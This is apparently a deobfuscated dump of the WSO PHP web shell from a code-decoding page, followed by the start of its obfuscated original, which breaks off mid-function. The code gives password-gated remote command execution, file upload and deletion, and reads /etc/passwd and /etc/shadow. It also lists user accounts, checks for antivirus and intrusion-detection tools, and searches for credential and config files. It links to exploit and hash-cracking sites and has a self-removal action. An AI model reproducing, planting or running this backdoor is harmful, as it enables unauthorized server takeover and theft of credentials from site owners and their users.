"/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto qljle; oE6Ue: $home_cwd = @getcwd(); goto qZOco; eRZM6: function wsoPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000>" . wsoPerms(@fileperms($f)) . "</font>"; } elseif (!@is_writable($f)) { return "<font color=white>" . wsoPerms(@fileperms($f)) . "</font>"; } else { return "<font color=#25ff00>" . wsoPerms(@fileperms($f)) . "</font>"; } } goto guAyk; HhMRL: function actionSecInfo() { goto wqp98; qT_UQ: wsoSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); goto zEzgM; oKr71: if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } goto owg70; giF29: wsoSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); goto V6Pow; o51U2: wsoSecParam("Open base dir", @ini_get("open_basedir")); goto giF29; m3Zin: wsoSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); goto o51U2; owg70: if (function_exists("oci_connect")) { $temp[] = "Oracle"; } goto DQ0Hi; I0L0t: if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysqli_get_client_info() . ")"; } goto T3sY7; T3sY7: if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } goto oKr71; Kcf2h: echo "<h1>Server security information</h1><div class=content>"; goto deosI; GSa9X: echo "<br>"; goto Ppg7_; zA3JJ: wsoSecParam("Server software", @getenv("SERVER_SOFTWARE")); goto aO8HS; IbU7m: echo "</div>"; goto XTIFZ; XTIFZ: wsoFooter(); goto jAziO; V6Pow: wsoSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); goto qT_UQ; zEzgM: $temp = array(); goto I0L0t; DQ0Hi: wsoSecParam("Supported databases", implode(", ", $temp)); goto GSa9X; Ppg7_: if ($GLOBALS["os"] == "nix") { goto yzksH; Pr2du: if (!$GLOBALS["safe_mode"]) { goto tBdFD; b1GnC: wsoSecParam("Userful", implode(", ", $temp)); goto gsw3Q; IArV4: $temp = array(); goto bo6ds; SphFn: wsoSecParam("Hosts", @file_get_contents("/etc/hosts")); goto dOgcI; bo6ds: foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto b1GnC; VXdNV: wsoSecParam("Danger", implode(", ", $temp)); goto xDJbP; tBdFD: $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); goto j1mm2; zL0U4: foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto VXdNV; F15O4: echo "<br/>"; goto vzm5g; gsw3Q: $temp = array(); goto zL0U4; AYbzB: wsoSecParam("Downloaders", implode(", ", $temp)); goto F15O4; M0R0C: $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); goto nuthD; dOgcI: echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null, null, "5", this . param1 . value, this . param2 . value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; goto Fh4yv; Fh4yv: if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) { goto TMVUA; Aagop: wsoSecParam("Users", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "<br/>"; goto Aagop; g4wsK: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { $temp .= join(":", $uid) . "
"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("HDD space", wsoEx("df -h")); goto SphFn; j1mm2: $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "<br>"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); goto ledym; ESH98: wsoSecParam("OS version", @file_get_contents("/proc/version")); goto ZLZ7x; ZLZ7x: wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); goto Pr2du; ledym: wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("Account Settings", wsoEx("net accounts")); goto RXCoL; NsBCo: wsoSecParam("OS Version", wsoEx("ver")); goto Me9Q1; RXCoL: wsoSecParam("User Accounts", wsoEx("net user")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "
") === false) { echo $v . " < br>"; } else { echo " < pre class=ml1 > " . $v . "</pre > "; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= " / "; } goto j4eIF; g7ZCc: @ini_set("log_errors", 0); goto ABTpd; XeOpc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto nYBgB; Oymko: if (!function_exists("hex2ascii")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "</select ><input type = 'submit' value = '>>' /> <input type = checkbox name = ajax value = 1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . " > send using AJAX < br><textarea name = 'input' style = 'margin-top:5px' class=bigarea > " . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea ></form ><pre class='ml1' style = '" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id = 'strOutput' > "; goto k5nqW; ZMcUd: if (!function_exists("ascii2hex")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf(" % 02X", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo " < h1>String conversions </h1 ><div class=content > "; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($item), $_POST["p2"]) !== false) { echo "<a href = '#' onclick = 'g("FilesTools",null,"" . urlencode($item) . "", "view","")' > " . htmlspecialchars($item) . "</a ><br > "; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != " / ") { $path .= " / "; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= " % " . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["ajax"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } goto vD3zd; vD3zd: $temp = "document . getElementById('strOutput') . style . display = '';document . getElementById('strOutput') . innerHTML = '" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "
", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } goto jZzWZ; OX44o: echo "<form name = 'toolsForm' onSubmit = 'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;' ><select name = 'selectTool' > "; goto BBAR5; Rfc53: wsoFooter(); goto JMM51; uWngZ: echo "</div ><br ><h1 > Search for hash:</
h1 ><div class=content > \xd\xa \x9<form method = 'post' target = '_blank' name = 'hf' >
\xa \x9\x9<input type = 'text' name = 'hash' style = 'width:200px;' ><br > \xd
<input type = 'hidden' name = 'act' value = 'find' />
\x9 <input type = 'button' value = 'hashcracking.ru' onclick = "document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()" ><br >
\x9 <input type = 'button' value = 'md5.rednoize.com' onclick = "document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()" ><br >
\xa <input type = 'button' value = 'crackfor.me' onclick = "document.hf.action='http://crackfor.me/index.php';document.hf.submit()" ><br >
\x9 </form ></div > "; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo "<option value = '" . htmlspecialchars($v) . "' > " . $k . "</option > "; } goto vUNKP; qLbIZ: if (@$_POST["p3"]) { wsoRecursiveGlob($_POST["c"]); } goto uWngZ; jZzWZ: echo "</pre ></div ><br ><h1 > Search files:</h1 ><div class=content > \xd
\x9 <form onsubmit = "g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;" ><table cellpadding = '1' cellspacing = '0' width = '50%' > \xd
\x9<tr ><td width = '1%' > Text:</td ><td ><input type = 'text' name = 'text' style = 'width:100%' ></td ></tr > \xd\xa\x9\x9 <tr ><td > Path:</td ><td ><input type = 'text' name = 'cwd' value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' style = 'width:100%' ></td ></tr > \xd\xa <tr ><td > Name:</td ><td ><input type = 'text' name = 'filename' value = '*' style = 'width:100%' ></td ></tr >
\xa\x9 <tr ><td ></td ><td ><input type = 'submit' value = '>>' ></td ></tr > \xd\xa \x9 </table ></form > "; goto awjDW; IHtdM: $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "win") { $aliases = array("list Directory" => "dir", "Find index . php in current dir" => "dir / s / w / b index . php", "Find * config *.php in current dir" => "dir / s / w / b * config *.php", "Show active connections" => "netstat - an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp - a", "IP Configuration" => "ipconfig / all"); } else { $aliases = array("list dir" => "ls - lha", "list file attributes on a Linux second extended file system" => "lsattr - va", "show opened ports" => "netstat - an | grep - i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f - perm - 04000 - ls", "find suid files in current dir" => "find . -type f - perm - 04000 - ls", "find all sgid files" => "find / -type f - perm - 02000 - ls", "find sgid files in current dir" => "find . -type f - perm - 02000 - ls", "find config . inc . php files" => "find / -type f - name config . inc . php", "find config * files" => "find / -type f - name "config*"", "find config * files in current dir" => "find . -type f - name "config*"", "find all writable folders and files" => "find / -perm - 2 - ls", "find all writable folders and files in current dir" => "find . -perm - 2 - ls", "find all service . pwd files" => "find / -type f - name service . pwd", "find service . pwd files in current dir" => "find . -type f - name service . pwd", "find all . htpasswd files" => "find / -type f - name . htpasswd", "find . htpasswd files in current dir" => "find . -type f - name . htpasswd", "find all . bash_history files" => "find / -type f - name . bash_history", "find . bash_history files in current dir" => "find . -type f - name . bash_history", "find all . fetchmailrc files" => "find / -type f - name . fetchmailrc", "find . fetchmailrc files in current dir" => "find . -type f - name . fetchmailrc", "Locate" => '', "locate httpd . conf files" => "locate httpd . conf", "locate vhosts . conf files" => "locate vhosts . conf", "locate proftpd . conf files" => "locate proftpd . conf", "locate psybnc . conf files" => "locate psybnc . conf", "locate my . conf files" => "locate my . conf", "locate admin . php files" => "locate admin . php", "locate cfg . php files" => "locate cfg . php", "locate conf . php files" => "locate conf . php", "locate config . dat files" => "locate config . dat", "locate config . php files" => "locate config . php", "locate config . inc files" => "locate config . inc", "locate config . inc . php" => "locate config . inc . php", "locate config .default.php files" => "locate config .default.php", "locate config * files " => "locate config", "locate . conf files" => "locate '.conf'", "locate . pwd files" => "locate '.pwd'", "locate . sql files" => "locate '.sql'", "locate . htpasswd files" => "locate '.htpasswd'", "locate . bash_history files" => "locate '.bash_history'", "locate . mysql_history files" => "locate '.mysql_history'", "locate . fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto MrsTM; Cjo7J: $color = "#df5"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . $explink . "" target=_blank>[exploit-db.com]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . wsoViewSize($totalSpace) . " <span>Free:</span> " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" . $opt_charsets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; goto RzURU; M4wyI: $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto wwJNm; yWMQp: $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); goto QAzn_; JIPap: if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } goto hedz2; nmRB7: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>\xd
< style>
\xabody{
background - color:#444;color:#e1e1e1;}
\xabody,td,th{
font:
9pt Lucida,Verdana;margin:0;vertical - align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{
color: {
$color}
!important;
}\xd
span{
font - weight: bolder; }\xd
h1{
border - left:5px solid {
$color};padding: 2px 5px;font: 14pt Verdana;background - color:#222;margin:0px; }\xd
div . content{
padding:
5px;margin - left:5px;background - color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa . ml1{
border:
1px solid #444;padding:5px;margin:0;overflow: auto; }
. bigarea{
width:
100 %;
height:
300px; }\xd\xainput,textarea,select{
margin:
0;
color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{
margin:
0px; }
\xa#toolsTbl{ text-align:center; }
\xa . toolsInp{
width:
300px }
\xa . main th{
text - align:left;background - color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{
background - color:#444}
\xa . l2{
background - color:#333}\xd
pre{
font - family:Courier,Monospace;}
</style >
\xa<script >
\xa var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xd\xa var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'\xd
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xd
var p1_ = '" . (strpos(@$_POST["p1"], "
") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';
var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xd\xa var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
var d = document;\xd\xa\x9function set(a, c, p1, p2, p3, charset){
\xa \x9if(a != null)d . mf . a . value = a;else d . mf . a . value = a_;\xd\xa if (c != null) d . mf . c . value = c; else d . mf . c . value = c_;
if (p1 != null) d . mf . p1 . value = p1; else d . mf . p1 . value = p1_;
\xa \x9if(p2 != null)d . mf . p2 . value = p2;else d . mf . p2 . value = p2_;\xd
\x9if(p3 != null)d . mf . p3 . value = p3;else d . mf . p3 . value = p3_;
\xa\x9\x9if(charset != null)d . mf . charset . value = charset;else d . mf . charset . value = charset_;\xd
}\xd\xa\x9function g(a, c, p1, p2, p3, charset){
\x9 set(a, c, p1, p2, p3, charset);\xd\xa\x9 d . mf . submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a, c, p1, p2, p3, charset);
\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i = 0;i < d . mf . elements . length;i++)
\xa\x9 \x9params += '&' + d . mf . elements[i] . name + '=' + encodeURIComponent(d . mf . elements[i] . value);\xd
\x9\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
\xa\x9}\xd
\x9function sr(url, params){\xd
\x9if(window . XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window . ActiveXObject) \xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {
\xd
req . onreadystatechange = processReqChange;\xd\xa req . open('POST', url, true);
\xa req . setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req . send(params);\xd
}
\xa }
\xa\x9function processReqChange(){
if ((req . readyState == 4))
\xa \x9\x9if(req . status == 200){\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr = reg . exec(req . responseText);\xd
\x9 eval(arr[2] . substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script >
\xa<head ><body ><div style = 'position:absolute;width:100%;background-color:#444;top:0;left:0;' >
<form method = post name = mf style = 'display:none;' > \xd
<input type = hidden name = a > \xd
<input type = hidden name = c > \xd
<input type = hidden name = p1 >
\xa<input type = hidden name = p2 > \xd
<input type = hidden name = p3 >
\xa<input type = hidden name = charset > \xd
</form > "; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["cwd"]); goto XR0lk; mxXoN: $explink = "http://exploit-db.com/search/?action=search&filter_description="; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("s"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["Self remove"] = "SelfRemove"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("/", $GLOBALS["cwd"]); goto MFEdT; CGFSE: if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["cwd"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= "<option value="" . $item . "" " . ($_POST["charset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } goto M4wyI; dJUUJ: if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("r"); goto znu8e; oXY47: if (!function_exists("posix_getegid")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "?"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["uid"]; goto nZ1Iw; nZ1Iw: $group = $gid["name"]; goto LgEQ1; LgEQ1: $gid = $gid["gid"]; goto XEe3x; q9aTZ: $user = $uid["name"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("which " . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\xd\xa</div>\xd
<table class=info id = toolsTbl cellpadding = 3 cellspacing = 0 width = 100 % style = 'border-top:2px solid #333;border-bottom:2px solid #333;' > \xd\xa\x9<tr >
\x9\x9<td ><form onsubmit = 'g(null,this.c.value,"");return false;' ><span > Change dir:</span ><br ><input class='toolsInp' type = text name = c value = '" . htmlspecialchars($GLOBALS["cwd"]) . "' ><input type = submit value = '>>' ></form ></td >
\xa \x9<td ><form onsubmit = "g('FilesTools',null,this.f.value);return false;" ><span > Read file:</span ><br ><input class='toolsInp' type = text name = f ><input type = submit value = '>>' ></form ></td > \xd
</tr ><tr >
\xa\x9 <td ><form onsubmit = "g('FilesMan',null,'mkdir',this.d.value);return false;" ><span > Make dir:</span >{
$is_writable}<br ><input class='toolsInp' type = text name = d ><input type = submit value = '>>' ></form ></td >
<td ><form onsubmit = "g('FilesTools',null,this.f.value,'mkfile');return false;" ><span > Make file:</span >{
$is_writable}<br ><input class='toolsInp' type = text name = f ><input type = submit value = '>>' ></form ></td >
\xa\x9</tr ><tr > \xd\xa <td ><form onsubmit = "g('Console',null,this.c.value);return false;" ><span > Execute:</span ><br ><input class='toolsInp' type = text name = c value = '' ><input type = submit value = '>>' ></form ></td >
\xa <td ><form method = 'post' ENCTYPE = 'multipart/form-data' >
\xa\x9\x9<input type = hidden name = a value = 'FilesMAn' >
\x9 <input type = hidden name = c value = '" . $GLOBALS["cwd"] . "' > \xd
\x9 <input type = hidden name = p1 value = 'uploadFile' > \xd
\x9\x9<input type = hidden name = charset value = '" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "' >
\x9\x9<span > Upload file:</span >{
$is_writable}<br ><input class='toolsInp' type = file name = f ><input type = submit value = '>>' ></form ><br ></td >
\x9</tr ></table ></div ></body ></html > "; } goto XeOpc; Qn_9k: function wsoLogin() { die("<pre align = center ><form method = post > Password: <input type = password name = pass ><input type = submit value = '>>' ></form ></pre > "); } goto e2q7d; i6mTz: function actionSelfRemove() { goto KQZY3; trHKc: if ($_POST["p1"] != "yes") { wsoHeader(); } goto X7soZ; X7soZ: echo " < h1>Suicide </h1 ><div class=content > Really want to remove the shell ?<br ><a href =# onclick="g(null,null,'yes')">Yes</a></div>"; goto tsvXj; KQZY3: if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } goto trHKc; tsvXj: wsoFooter(); goto n3JxC; n3JxC: } goto DbGtY; TQr3j: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { wsoLogin(); } } goto tZUOM; e2q7d: function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto TQr3j; yXkOt: function wsoViewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto etiAC; Zxful: exit; ?>
Did this file decode correctly?
Original Code
<?php
goto Cjo7J;
LqaMO:
$safe_mode = @ini_get("safe_mode");
goto zGahs;
zGahs:
if (!$safe_mode) {
error_reporting(0);
}
goto Gop14;
j2Rfu:
if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) {
call_user_func("action" . $_POST["a"]);
}
goto Zxful;
GFRHq:
@ini_set("error_log", NULL);
goto g7ZCc;
N84uU:
function actionFilesMan()
{
goto J7jRR;
la8rp:
if (class_exists("ZipArchive")) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
}
goto GTtN3;
uO4Od:
if (!empty($_POST["p1"])) {
switch ($_POST["p1"]) {
case "uploadFile":
if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
echo "Can't upload file!";
}
break;
case "mkdir":
if (!@mkdir($_POST["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
goto zgV_d;
mm32x:
break;
goto hEfbk;
zgV_d:
function deleteDir($path)
{
goto RrCM3;
zxeby:
$dh = opendir($path);
goto TCJ3G;
TCJ3G:
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (basename($item) == ".." || basename($item) == ".") {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
goto qhDI4;
SLRoZ:
@rmdir($path);
goto ld2N6;
RrCM3:
$path = substr($path, -1) == "/" ? $path : $path . "/";
